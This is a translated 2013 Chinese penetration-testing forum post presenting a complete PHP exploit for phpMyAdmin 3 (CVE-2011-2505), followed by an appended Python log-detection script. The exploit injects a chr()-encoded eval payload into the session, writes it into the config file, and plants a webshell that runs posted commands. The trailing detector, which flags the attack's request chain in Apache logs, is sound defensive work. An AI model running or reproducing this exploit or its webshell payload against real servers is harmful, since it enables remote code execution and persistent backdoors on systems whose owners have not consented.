中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: phpadmin3 remote code execute, PHP version exploit
Author: admin
Time: 2013-2-21 09:13
Lately I have been a full-time stay-at-home dad, out of touch with the scene for many months, and the blog has not been updated either.

Last night I was up all night with the kid and saw heige's discussion of the phpMyAdmin3 vulnerability in the php security group. I had not read the vulnerable code before, but a while back I did see wofeiwo's exploit on Weibo. According to heige, though, there is a way to exploit it that is not "jilei" (chicken ribs, i.e. not useless), so during the night I dug out the code, studied it, and wrote this warmed-over exploit. Since I got to it late and many people had already studied it and written exploits, mine is just reheating leftovers; take it as a bit of research to pass the time.

First, kudos to wofeiwo's Python version of the exploit, and kudos to wofeiwo's and superhei's spirit of inquiry, a model to learn from. That earlier exploit, however, has some limitations in use:

First, it requires session.auto_start = 1;

Second, in the default pma3 code the libraries directory is already denied access via .htaccess.

And of course there is a third point, a gulf nobody can cross: the config directory must exist and be writable.

After reading heige's remarks in the group and looking at the code again, I found that the first two limitations can both be ignored. So this vulnerability really can be less of a "chicken rib" than it seemed.

So I wrote this PHP version of the exploit; the code follows:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
 **/
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
 **/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
 **/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
    // the ":$token" / ":$sessionid" interpolation was lost in the forum copy and is restored here
    echo "[+] token:$token\n";
    echo "[+] Session ID:$sessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
 **/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.

/**
 * Try to create webshell
 **/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
 **/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Expoilt successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

function php_request($url,$data='',$cookie=''){
    global $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}
?>
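The request sequence the script above sends leaves a recognisable trail in the web server's access log. The following Python script is an added detection example, not part of oldjun's post and not phpMyAdmin code: it parses Apache combined-format log lines and flags the three stages visible in the exploit, a query string carrying a `_SESSION[...]` key together with `session_to_unset`, a POST to `setup/config.php`, and a successful read of `config/config.inc.php`, then reports any source IP that completes the whole chain. The sample log lines, the client addresses, the `/pma/` prefix and the `code` placeholder standing in for the injected PHP are all constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (Apache combined format). Addresses, the /pma/
# prefix and the "code" placeholder inside the injected key are made up here.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Feb/2013:09:13:01 +0800] "GET /pma/config/ HTTP/1.1" 403 210 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Feb/2013:09:13:02 +0800] "GET /pma/index.php HTTP/1.1" 200 9120 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Feb/2013:09:13:03 +0800] "GET /pma/db_create.php?token=0123456789abcdef0123456789abcdef&session_to_unset=x&_SESSION%5BConfigFile%5D%5BServers%5D%5B*/code/*%5D%5Bhost%5D=x HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Feb/2013:09:13:04 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 1880 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Feb/2013:09:13:05 +0800] "GET /pma/config/config.inc.php HTTP/1.1" 200 5 "-" "Mozilla/4.0"
198.51.100.7 - - [21/Feb/2013:09:15:00 +0800] "GET /pma/index.php?db=test&token=00000000000000000000000000000000 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

# ip ident user [timestamp] "METHOD target protocol" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def parse_line(line):
    """Split one log line into ip, method, path, decoded query keys and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec['target'].partition('?')
    rec['path'] = path
    # Split on '&' only (never ';'), then URL-decode each key so that
    # %5B / %5D become the [ ] of a PHP array parameter.
    rec['query_keys'] = [unquote(p.split('=', 1)[0]) for p in query.split('&') if p]
    rec['status'] = int(rec['status'])
    return rec

def classify(rec):
    """Names of the detection rules one request trips (possibly several)."""
    hits = []
    # A GET parameter named _SESSION[...] is the session-array overwrite that
    # CVE-2011-2505 allows; a legitimate phpMyAdmin client never sends one.
    if any(k.startswith('_SESSION[') for k in rec['query_keys']):
        hits.append('session_array_injection')
    if 'session_to_unset' in rec['query_keys']:
        hits.append('session_to_unset_param')
    # The setup script persisting the (poisoned) session into config/config.inc.php.
    if rec['method'] == 'POST' and rec['path'].endswith('/setup/config.php'):
        hits.append('setup_config_write')
    # config/ should not exist, or not be web-readable, on a finished install.
    if rec['path'].endswith('/config/config.inc.php') and rec['status'] == 200:
        hits.append('config_dir_served')
    return hits

def scan(log_text):
    """Return one finding dict per (line, rule) over a whole log."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        for rule in classify(rec):
            findings.append({'line': lineno, 'ip': rec['ip'],
                             'rule': rule, 'path': rec['path']})
    return findings

# The three stages that together mean the config file was rewritten via the session.
CHAIN = {'session_array_injection', 'setup_config_write', 'config_dir_served'}

def correlate(findings):
    """Source IPs whose findings cover the complete inject -> write -> verify chain."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f['ip'], set()).add(f['rule'])
    return sorted(ip for ip, rules in by_ip.items() if CHAIN <= rules)

if __name__ == '__main__':
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f"line {f['line']:>3}  {f['ip']:<15} {f['rule']:<25} {f['path']}")
    print('full chain from:', correlate(found))
```

The `config_dir_served` rule doubles as a standing misconfiguration check: a 200 for `config/config.inc.php` means the third precondition named in the post (a config directory that exists and is reachable) holds on that server, whether or not anyone has exploited it yet. Keys are URL-decoded before matching because the `[` and `]` of the injected array name arrive percent-encoded in most logs.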